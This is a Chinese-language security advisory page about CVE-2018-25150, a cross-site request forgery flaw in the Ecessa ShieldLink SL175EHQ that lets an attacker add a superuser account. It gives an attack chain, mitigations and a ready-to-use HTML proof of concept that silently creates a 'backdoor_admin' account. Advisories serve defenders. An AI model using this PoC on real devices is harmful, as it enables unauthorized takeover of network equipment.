IPBUF安全漏洞报告
English
CVE-2018-25150 CVSS 5.3 中危

CVE-2018-25150 Ecessa ShieldLink SL175EHQ CSRF漏洞可创建管理员账户

披露日期: 2025-12-24

漏洞信息

漏洞编号
CVE-2018-25150
漏洞类型
跨站请求伪造(CSRF)
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Ecessa ShieldLink SL175EHQ

相关标签

CSRF跨站请求伪造EcessaShieldLinkSL175EHQ身份验证绕过后门账户网络设备漏洞CVE-2018-25150

漏洞概述

CVE-2018-25150是Ecessa ShieldLink SL175EHQ 10.7.4版本中存在的一个跨站请求伪造(CSRF)漏洞。该漏洞允许未经身份验证的攻击者通过诱使已登录的管理员访问恶意网页,在目标设备上创建具有超级用户权限的管理员账户。由于该设备通常用于网络流量管理和安全防护,一旦攻击者获得管理员权限,可以完全控制设备配置,可能导致网络中断、数据泄露或进一步的网络渗透攻击。此漏洞的CVSS评分为5.3,属于中等严重程度,但考虑到攻击的简便性和潜在影响范围,仍需及时修复。

技术细节

该CSRF漏洞存在于Ecessa ShieldLink SL175EHQ设备的Web管理界面中。攻击者可以利用以下技术细节进行利用:首先,攻击者构造一个包含隐藏表单的恶意HTML页面,该表单会自动提交针对设备管理接口的HTTP请求。表单中的参数包括创建新用户所需的字段,如用户名、密码和权限级别。由于Web应用缺乏有效的CSRF令牌验证机制,浏览器会在用户已登录的情况下自动发送有效的会话Cookie,从而使得恶意请求被服务器接受并执行。攻击者通常会将恶意页面托管在外部服务器上,并通过社会工程学手段诱导目标管理员访问。一旦管理员访问该页面,无需任何交互操作(页面中的JavaScript会自动提交表单),请求即被发送。服务器验证会话有效后,会创建一个新的管理员账户,攻击者即可使用该账户登录设备管理界面。

攻击链分析

STEP 1
步骤1
攻击者创建恶意HTML页面,包含隐藏的表单元素,表单action指向目标设备的用户管理接口
STEP 2
步骤2
攻击者通过钓鱼邮件、恶意链接或社会工程学手段诱使已登录的管理员访问恶意页面
STEP 3
步骤3
管理员浏览器加载恶意页面,JavaScript自动提交隐藏表单,利用浏览器自动携带的会话Cookie发送请求
STEP 4
步骤4
目标设备服务器验证会话有效后,执行用户创建操作,在设备上添加具有超级用户权限的后门账户
STEP 5
步骤5
攻击者使用创建的账户登录设备管理界面,获得完整的设备控制权限
STEP 6
步骤6
攻击者可以修改网络配置、监听流量或利用设备作为跳板进行进一步的网络攻击

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CVE-2018-25150 CSRF PoC - Create Admin User --> <!-- Target: Ecessa ShieldLink SL175EHQ --> <!DOCTYPE html> <html> <head> <title>Loading...</title> </head> <body> <form action="http://<target_ip>/cgi-bin/admin.cgi" method="POST" id="csrf_form"> <input type="hidden" name="action" value="user_add"> <input type="hidden" name="username" value="backdoor_admin"> <input type="hidden" name="password" value="P@ssw0rd123"> <input type="hidden" name="privilege" value="superuser"> <input type="hidden" name="Submit" value="Add"> </form> <script> // Auto-submit the form without user interaction document.getElementById('csrf_form').submit(); </script> </body> </html>

影响范围

Ecessa ShieldLink SL175EHQ 10.7.4

防御指南

临时缓解措施
在官方补丁发布前,可采取以下临时缓解措施:1)限制管理界面的访问来源,仅允许受信任的IP地址访问Web管理接口;2)使用网络层访问控制列表(ACL)保护管理端口;3)定期检查设备用户账户,及时发现可疑账户;4)对管理员进行安全意识培训,避免访问未知链接;5)考虑使用VPN连接进行设备管理,确保管理通道的安全性。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表